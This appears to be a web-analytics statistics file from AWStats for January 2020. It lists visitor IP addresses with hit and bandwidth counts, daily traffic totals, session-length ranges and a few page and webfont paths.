34.69.203.151 1 1 4144 20200119085735
123.126.68.128 0 1 9319 
183.36.115.77 0 1 122437 
73.103.133.204 2 75 6419026 20200123213450
76.90.137.129 3 77 6423707 20200120063748
183.36.114.119 0 2 54372 
149.100.187.233 1 1 28965 20200123060759
65.93.134.72 2 74 6315324 20200113104636
31.13.127.19 0 1 15533 
66.249.93.84 1 37 1675832 20200111034818
52.34.31.242 1 1 32890 20200128115930
18.209.245.197 1 1 32890 20200130111210
166.137.102.111 2 85 6661503 20200127172857
40.94.36.89 1 21 1014656 20200130171608
36.110.147.88 0 1 9063 
183.36.114.67 0 3 46599 
183.36.114.15 0 2 6906 
4.53.133.38 2 86 6662485 20200128180649
54.185.216.12 1 1 32890 20200128125329
118.92.163.196 2 75 6315861 20200114183837
23.226.211.252 0 1 537 
173.252.79.10 0 1 15533 
54.218.91.234 1 1 32897 20200131174104
40.94.36.90 0 1 537 
123.126.68.107 0 1 71398 
174.220.12.170 2 85 6661526 20200131205313
107.77.97.15 2 76 6419989 20200123213749
183.36.114.86 0 2 20505 
36.110.147.107 0 2 768994 
183.36.114.174 0 2 794583 
45.48.164.218 2 75 6419026 20200124152324
174.63.0.57 2 75 6315861 20200114165610
76.115.215.193 2 76 6327399 20200116194156
66.214.189.246 2 84 6660966 20200127172742
173.252.127.22 0 1 613900 
183.36.114.156 0 1 719567 
104.35.35.113 2 75 6315861 20200114122335
123.126.68.117 0 2 23688 
111.202.102.67 0 2 67261 
5.180.62.88 2 75 6419026 20200117100238
74.79.223.161 2 85 6661952 20200131204050
106.120.188.154 0 3 54844 
75.104.65.140 3 92 10826437 20200128161837
174.85.47.19 0 5 853902 
66.249.83.86 0 7 275950 
173.252.127.17 1 25 2521825 20200131193130
183.36.114.30 0 1 3595 
40.94.95.73 1 10 1795018 20200129124447
194.166.81.57 2 75 6315861 20200114121041
107.77.97.86 2 37 6248374 20200117204102
47.154.19.249 2 74 6314898 20200110110941
23.243.237.165 2 75 6419026 20200123213727
216.208.179.90 2 84 6660989 20200131195900
40.94.95.95 0 11 1589161 
183.36.114.121 0 1 52247 
183.36.115.110 0 3 609929 
183.36.114.14 0 2 278805 
104.50.183.61 2 77 6420526 20200124125453
106.120.188.141 0 2 3796 
31.13.127.7 0 27 2949807 
34.226.122.102 1 1 4093 20200110212009
104.222.33.64 1 1 28965 20200121142710
166.170.15.60 4 117 10360672 20200109214049
183.36.114.146 0 1 226676 
171.13.14.84 2 13 1197899 20200113051438
123.126.68.119 0 3 2341002 
38.88.232.58 2 86 6662485 20200129145333
73.110.53.203 4 106 12552777 20200121105113
71.127.173.113 2 85 6661526 20200131193408
66.249.93.80 0 22 2119925 
174.194.203.191 2 16 1822887 20200128111331
85.255.234.144 2 76 6419989 20200116081748
104.14.131.56 2 77 6420526 20200120203955
72.90.75.50 2 85 6661952 20200131200558
108.12.16.24 2 85 6661952 20200131202624
64.233.172.127 1 2 4684 20200115170801
183.36.114.114 0 1 2383 
23.241.242.20 2 86 6662466 20200127222233
45.33.127.143 1 1 4144 20200125080934
217.32.153.3 2 74 6315324 20200110181723
64.246.187.42 1 1 4374 20200127144013
24.61.42.217 2 84 6660989 20200131194329
104.245.145.20 1 1 4144 20200122121756
74.79.210.249 2 85 6661526 20200131214430
172.58.45.102 2 76 6419563 20200122001653
174.220.2.244 2 85 6661526 20200131194509
174.220.3.109 2 84 6660989 20200131201809
36.110.147.82 0 1 72782 
52.38.77.76 1 1 28965 20200121184810
107.77.97.81 2 76 6419989 20200120230500
24.90.149.30 2 74 6315324 20200112024837
51.159.18.103 1 1 4147 20200115142258
18.236.138.145 1 1 32890 20200128120013
66.205.145.220 2 75 6315861 20200110103625
183.36.114.104 0 1 1267 
66.60.149.210 2 75 6315861 20200110103516
183.36.115.131 0 3 228363 
198.143.133.154 1 1 4093 20200114153650
40.94.95.26 0 19 513201 
108.41.92.237 2 76 6419563 20200120202419
106.120.188.130 0 2 173498 
76.31.82.204 2 77 6441850 20200120213459
31.13.115.12 0 1 613900 
2.181.229.157 1 1 4144 20200115221636
66.220.149.6 2 44 2290243 20200123181938
172.58.231.138 2 85 6661526 20200131201601
85.184.151.36 2 85 6661522 20200130133728
184.91.157.92 2 84 6660989 20200131203427
52.166.133.104 1 1 4093 20200110205347
216.178.109.86 2 86 6662485 20200128164851
185.183.96.122 2 2 8748 20200130185609
35.195.238.221 1 1 32890 20200129092000
173.252.87.13 1 36 2368396 20200125145643
23.252.240.216 1 1 32890 20200130054400
183.36.115.11 0 1 3646 
94.62.219.55 1 1 28321 20200110083531
71.238.47.148 2 75 6419026 20200119235717
104.173.240.137 3 79 7077961 20200128082116
62.210.79.40 1 1 32895 20200131100221
68.48.137.66 2 77 6420526 20200118005825
99.110.241.160 1 2 41743 20200113161419
71.236.143.172 2 75 6419026 20200120180744
193.30.121.226 1 1 32890 20200129221738
35.160.27.190 1 1 4144 20200124211044
54.242.169.12 1 11 1364190 20200122134315
23.241.153.189 1 1 4144 20200115232411
34.231.68.152 1 1 4144 20200117030748
58.250.125.185 3 3 12432 20200124205004
36.110.147.77 0 1 41266 
104.132.7.70 2 75 6315861 20200110175636
34.68.80.193 1 1 0 20200114175157
3.87.65.70 2 22 2728610 20200128132811
54.162.38.83 1 1 4144 20200119191159
173.252.87.32 1 6 1734863 20200125145642
52.89.81.141 1 1 4144 20200125191958
73.11.153.150 1 1 4374 20200129203839
176.199.208.214 2 84 6660985 20200128163159
106.120.188.163 0 1 164796 
34.216.114.198 2 2 65780 20200128114036
172.91.152.118 2 76 6419989 20200124222442
35.222.107.184 1 1 4144 20200117172227
173.94.8.176 2 84 6660989 20200131201045
52.39.183.101 1 1 28965 20200121163044
40.94.36.39 0 18 306685 
158.106.208.154 2 86 6662485 20200128161319
24.59.161.246 2 84 6660989 20200131193316
171.13.14.55 0 2 602567 
108.169.68.35 2 86 6662493 20200131121911
174.224.6.192 2 76 6419989 20200121104546
73.176.219.155 4 114 12668900 20200121105038
34.220.153.138 1 1 28965 20200121210531
77.111.247.111 2 77 6420526 20200117034310
23.239.180.144 0 1 537 
71.127.176.84 2 84 6660989 20200131194702
31.13.127.4 0 1 15533 
73.37.33.119 2 85 6661948 20200130124859
36.110.147.104 2 4 90260 20200121013140
100.33.141.188 2 86 6662489 20200131190532
71.115.143.89 2 100 8479359 20200131193726
45.56.150.197 2 24 3109361 20200118211543
95.211.209.246 3 85 6686110 20200129154859
174.193.194.207 3 90 7646387 20200127223647
54.92.175.135 2 2 61855 20200130150623
123.126.68.114 0 2 113418 
104.222.43.160 1 1 28965 20200123095820
18.237.27.204 1 1 28965 20200120152741
123.125.125.81 0 1 3626 
69.171.251.17 0 6 965742 
31.13.115.5 0 12 665829 
183.36.114.28 0 4 177102 
174.230.23.139 2 38 2265116 20200110172304
173.252.127.10 1 3 656041 20200131193129
195.154.63.222 1 1 28321 20200112000058
66.249.83.87 1 9 335734 20200115080132
88.214.27.3 1 1 28321 20200113053104
183.36.115.147 0 2 227179 
174.62.112.248 2 77 6420526 20200122010110
172.58.45.40 2 76 6419989 20200121151735
199.116.169.254 1 1 32895 20200131110926
183.36.114.161 0 1 719567 
202.131.123.12 2 28 3124363 20200118024825
183.36.114.182 0 3 2158701 
172.90.110.48 2 85 6661410 20200131151131
34.217.100.109 1 1 32890 20200128110421
67.249.96.28 2 84 6660989 20200131211905
36.110.147.98 0 1 64663 
5.9.124.188 2 84 6660993 20200131003200
136.179.21.84 2 75 6315861 20200110142640
172.58.75.128 2 77 6423507 20200115182337
209.150.231.35 2 85 7232603 20200131200839
123.126.68.140 0 1 3476 
36.110.147.100 0 1 780334 
34.212.19.226 1 1 4144 20200122204952
73.110.45.82 2 77 6420526 20200115233040
52.32.102.56 1 1 28965 20200124172424
24.59.150.75 2 86 6662485 20200130192233
66.249.83.85 0 15 2380972 
73.96.185.67 2 75 6419026 20200125193457
69.171.251.26 0 8 910668 
163.172.70.242 1 1 28321 20200112001457
172.58.75.217 2 75 2714052 20200115180707
66.249.88.210 1 11 189444 20200115080133
40.94.95.40 0 14 745582 
99.25.230.182 2 85 6661526 20200131200404
64.52.30.169 2 75 6419026 20200124053028
71.115.242.86 2 84 6660989 20200131200210
54.210.139.197 1 11 1364420 20200127192100
40.94.95.92 0 1 537 
68.96.72.104 2 75 6315861 20200109214235
174.97.9.83 3 76 6319954 20200111135958
100.7.196.69 2 66 5710704 20200131221307
72.194.124.140 2 76 6440887 20200117115956
52.39.237.79 1 1 32890 20200130145705
34.219.36.191 2 2 57930 20200121210640
106.39.246.14 3 3 12432 20200124205004
172.58.27.162 2 50 4094595 20200123232433
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 23
20200109 18 630 48023301 8
20200110 44 1326 111379726 25
20200111 5 150 12638259 4
20200112 10 93 7973245 9
20200113 31 773 65933519 18
20200114 40 1210 102710072 22
20200115 53 1376 111947865 24
20200116 20 538 46351072 13
20200117 21 595 54928569 14
20200118 22 586 45039524 13
20200119 21 479 40678038 13
20200120 26 706 59771619 16
20200121 46 791 79625802 34
20200122 26 635 52891199 17
20200123 24 738 63251213 15
20200124 40 880 77856336 27
20200125 26 816 64256207 14
20200126 7 255 19988346 4
20200127 68 1783 145312336 34
20200128 65 1828 136813595 36
20200129 46 839 68380069 20
20200130 60 1745 138453288 36
20200131 197 7637 604018958 87
END_DAY

# Session range - Number of visits
BEGIN_SESSION 7
1h+ 3
0s-30s 480
2mn-5mn 3
30s-2mn 3
30mn-1h 6
15mn-30mn 6
5mn-15mn 2
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 25 first Pages must be first (order not required for others)
BEGIN_SIDER 4
/ 589 5191164 492 226
/webfonts/fontawesome/fontawesome-webfont.woff2 322 24846156 11 272
/webfonts/fontawesome/fontawesome-webfont.woff 3 293739 0 3
/webfonts/fontawesome/fontawesome-webfont.eot 2 196972 0 2
END_SIDER
